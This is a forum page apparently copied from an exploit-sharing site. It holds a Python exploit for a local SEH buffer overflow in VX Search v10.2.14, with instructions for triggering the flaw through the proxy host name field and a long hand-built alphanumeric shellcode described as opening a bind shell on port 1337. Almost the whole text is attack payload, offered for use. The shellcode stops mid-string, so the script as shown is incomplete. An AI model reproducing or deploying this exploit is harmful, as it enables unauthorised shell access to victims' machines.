Search the Community
Showing results for tags 'vx search'.
-
#!/usr/bin/env python # # Exploit Title : VXSearch v10.2.14 Local SEH Overflow # Date : 11/16/2017 # Exploit Author : wetw0rk # Vendor Homepage : http://www.flexense.com/ # Software link : http://www.vxsearch.com/setups/vxsearchent_setup_v10.2.14.exe # Version : 10.2.14 # Tested on : Windows 7 (x86) # Description : VX Search v10.2.14 suffers from a local buffer overflow. The # following exploit will generate a bind shell on port 1337. I # was unable to get a shell working with msfvenom shellcode so # below is a custom alphanumeric bind shell. Greetz rezkon ;) # # trigger the vulnerability by : # Tools -> Advanced options -> Proxy -> *Paste In Proxy Host Name # import struct shellcode = "w00tw00t" shellcode += ( "\x25\x4a\x4d\x4e\x55" # and eax, 0x554e4d4a "\x25\x35\x32\x31\x2a" # and eax, 0x2a313235 "\x2d\x6a\x35\x35\x35" # sub eax, 0x3535356a "\x2d\x65\x6a\x6a\x65" # sub eax, 0x656a6a65 "\x2d\x61\x64\x4d\x65" # sub eax, 0x654d6461 "\x50" # push eax "\x5c" # pop esp ) shellcode += ( "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x4f\x4f\x4f\x4f" "\x2d\x4f\x30\x4f\x68\x2d\x62\x2d\x62\x72\x50\x25\x4a\x4d\x4e" "\x55\x25\x35\x32\x31\x2a\x2d\x76\x57\x57\x63\x2d\x77\x36\x39" "\x32\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x41\x54" "\x54\x54\x2d\x25\x54\x7a\x2d\x2d\x25\x52\x76\x36\x50\x25\x4a" "\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x49\x35\x49\x49\x2d\x49" "\x25\x49\x69\x2d\x64\x25\x72\x6c\x50\x25\x4a\x4d\x4e\x55\x25" "\x35\x32\x31\x2a\x2d\x70\x33\x33\x25\x2d\x70\x25\x70\x25\x2d" "\x4b\x6a\x56\x39\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a" "\x2d\x79\x55\x75\x32\x2d\x79\x75\x75\x55\x2d\x79\x77\x77\x78" "\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x25\x4a\x4a" "\x25\x2d\x39\x5f\x4d\x34\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32" "\x31\x2a\x2d\x4b\x57\x4b\x57\x2d\x70\x76\x4b\x79\x2d\x70\x76" "\x78\x79\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x49" "\x49\x49\x49\x2d\x49\x4e\x64\x49\x2d\x78\x25\x78\x25\x2d\x6f" "\x25\x7a\x48\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d" "\x58\x58\x38\x58\x2d\x58\x30\x32\x58\x2d\x51\x46\x2d\x47\x50" "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x5f\x52\x5f\x5f" "\x2d\x5f\x25\x25\x35\x2d\x62\x39\x25\x25\x50\x25\x4a\x4d\x4e" "\x55\x25\x35\x32\x31\x2a\x2d\x4a\x4a\x4a\x4a\x2d\x4a\x4a\x4a" "\x4a\x2d\x79\x39\x4a\x79\x2d\x6d\x32\x4b\x68\x50\x25\x4a\x4d" "\x4e\x55\x25\x35\x32\x31\x2a\x2d\x30\x30\x71\x30\x2d\x30\x25" "\x71\x30\x2d\x38\x31\x51\x5f\x50\x25\x4a\x4d\x4e\x55\x25\x35" "\x32\x31\x2a\x2d\x32\x32\x32\x32\x2d\x78\x77\x7a\x77\x50\x25" "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x62\x62\x62\x62\x2d" "\x48\x57\x47\x4f\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a" "\x2d\x76\x76\x4f\x4f\x2d\x36\x39\x5a\x5a\x50\x25\x4a\x4d\x4e" "\x55\x25\x35\x32\x31\x2a\x2d\x61\x61\x61\x61\x2d\x4a\x61\x4a" "\x25\x2d\x45\x77\x53\x35\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32" "\x31\x2a\x2d\x63\x63\x63\x63\x2d\x39\x63\x63\x2d\x2d\x32\x63" "\x7a\x25\x2d\x31\x49\x7a\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35" "\x32\x31\x2a\x2d\x72\x79\x79\x79\x2d\x25\x30\x25\x30\x2d\x25" "\x32\x25\x55\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d" "\x58\x58\x41\x58\x2d\x58\x58\x25\x77\x2d\x6e\x51\x32\x69\x50" "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x48\x77\x38\x48" "\x2d\x4e\x76\x6e\x61\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31" "\x2a\x2d\x41\x41\x6e\x6e\x2d\x31\x31\x30\x6e\x2d\x37\x36\x30" "\x2d\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x38\x38" "\x38\x38\x2d\x38\x79\x38\x25\x2d\x38\x79\x38\x25\x2d\x58\x4c" "\x73\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x61" "\x52\x61\x52\x2d\x37\x4a\x31\x49\x50\x25\x4a\x4d\x4e\x55\x25" "\x35\x32\x31\x2a\x2d\x4d\x47\x4d\x4d\x2d\x30\x25\x4d\x6b\x2d" "\x36\x32\x66\x71\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a" "\x2d\x36\x43\x43\x6c\x2d\x33\x54\x47\x25\x50\x25\x4a\x4d\x4e" "\x55\x25\x35\x32\x31\x2a\x2d\x4c\x4c\x4c\x4c\x2d\x6e\x4c\x6e" "\x36\x2d\x65\x67\x6f\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32" "\x31\x2a\x2d\x25\x25\x4b\x4b\x2d\x25\x25\x6f\x4b\x2d\x4e\x41" "\x59\x2d\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x41" "\x41\x41\x41\x2d\x52\x52\x78\x41\x2d\x6e\x6c\x70\x25\x50\x25" "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x30\x6c\x30\x30\x2d" "\x30\x6c\x6c\x30\x2d\x38\x70\x79\x66\x50\x25\x4a\x4d\x4e\x55" "\x25\x35\x32\x31\x2a\x2d\x42\x70\x70\x45\x2d\x32\x45\x70\x31" "\x2d\x25\x4b\x49\x31\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31" "\x2a\x2d\x25\x50\x50\x50\x2d\x25\x7a\x72\x25\x2d\x4e\x73\x61" "\x52\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x35\x77" "\x74\x74\x2d\x61\x78\x35\x34\x50\x25\x4a\x4d\x4e\x55\x25\x35" "\x32\x31\x2a\x2d\x30\x30\x30\x30\x2d\x30\x30\x59\x30\x2d\x30" "\x30\x74\x51\x2d\x6b\x36\x79\x67\x50\x25\x4a\x4d\x4e\x55\x25" "\x35\x32\x31\x2a\x2d\x75\x38\x43\x43\x2d\x7a\x31\x43\x43\x2d" "\x7a\x2d\x77\x79\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a" "\x2d\x59\x59\x59\x59\x2d\x59\x59\x59\x59\x2d\x6f\x6c\x4d\x77" "\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x45\x45\x45" "\x45\x2d\x34\x2d\x76\x45\x2d\x37\x25\x5a\x65\x50\x25\x4a\x4d" "\x4e\x55\x25\x35\x32\x31\x2a\x2d\x34\x34\x34\x34\x2d\x62\x34" "\x34\x34\x2d\x6d\x56\x47\x57\x50\x25\x4a\x4d\x4e\x55\x25\x35" "\x32\x31\x2a\x2d\x2d\x2d\x2d\x2d\x2d\x76\x2d\x2d\x76\x2d\x55" "\x4c\x55\x7a\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d" "\x77\x77\x77\x30\x2d\x47\x47\x79\x30\x2d\x42\x42\x39\x34\x50" "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x56\x75\x36\x51" "\x2d\x42\x61\x49\x43\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31" "\x2a\x2d\x56\x56\x31\x56\x2d\x31\x79\x31\x25\x2d\x50\x6c\x48" "\x34\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x72\x72" "\x72\x72\x2d\x72\x25\x38\x38\x2d\x38\x25\x25\x25\x2d\x54\x41" "\x30\x30\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x47" "\x47\x47\x76\x2d\x47\x47\x76\x76\x2d\x6b\x72\x6c\x5a\x50\x25" "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x25\x71\x25\x71\x2d" "\x73\x42\x63\x68\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a" "\x2d\x48\x55\x51\x51\x2d\x45\x78\x4f\x5a\x50\x25\x4a\x4d\x4e" "\x55\x25\x35\x32\x31\x2a\x2d\x45\x45\x45\x32\x2d\x45\x45\x25" "\x31\x2d\x76\x75\x2d\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32" "\x31\x2a\x2d\x6e\x4f\x6d\x6e\x2d\x35\x48\x5f\x5f\x50\x25\x4a" "\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x2d\x2d\x2d\x2d\x2d\x71" "\x2d\x2d\x71\x2d\x71\x2d\x4a\x71\x2d\x66\x65\x70\x62\x50\x25" "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x56\x30\x56\x30\x2d" "\x56\x38\x25\x30\x2d\x74\x37\x25\x45\x50\x25\x4a\x4d\x4e\x55" "\x25\x35\x32\x31\x2a\x2d\x32\x32\x32\x77\x2d\x32\x32\x32\x32" "\x2d\x43\x41\x4a\x57\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31" "\x2a\x2d\x63\x63\x63\x30\x2d\x79\x41\x41\x6e\x50\x25\x4a\x4d" "\x4e\x55\x25\x35\x32\x31\x2a\x2d\x4b\x4b\x4b\x4b\x2d\x4b\x4b" "\x25\x31\x2d\x4b\x71\x25\x32\x2d\x4f\x6e\x25\x2d\x50\x25\x4a" "\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x37\x37\x37\x37\x2d\x6d" "\x37\x6d\x37\x2d\x6d\x37\x6d\x37\x2d\x64\x55\x63\x58\x50\x25" "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x44\x6c\x6c\x6c\x2d" "\x34\x44\x44\x6c\x2d\x30\x33\x4e\x54\x50\x25\x4a\x4d\x4e\x55" "\x25\x35\x32\x31\x2a\x2d\x2d\x7a\x43\x2d\x2d\x48\x79\x71\x47" "\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x41\x41\x41" "\x41\x2d\x41\x46\x71\x25\x2d\x5a\x77\x7a\x32\x50\x25\x4a\x4d" "\x4e\x55\x25\x35\x32\x31\x2a\x2d\x47\x47\x47\x47\x2d\x47\x6e" "\x47\x6e\x2d\x47\x78\x6e\x78\x2d\x47\x79\x77\x79\x50\x25\x4a" "\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x74\x38\x69\x38\x2d\x51" # 0day.today [2017-11-17] # Source: 0day.today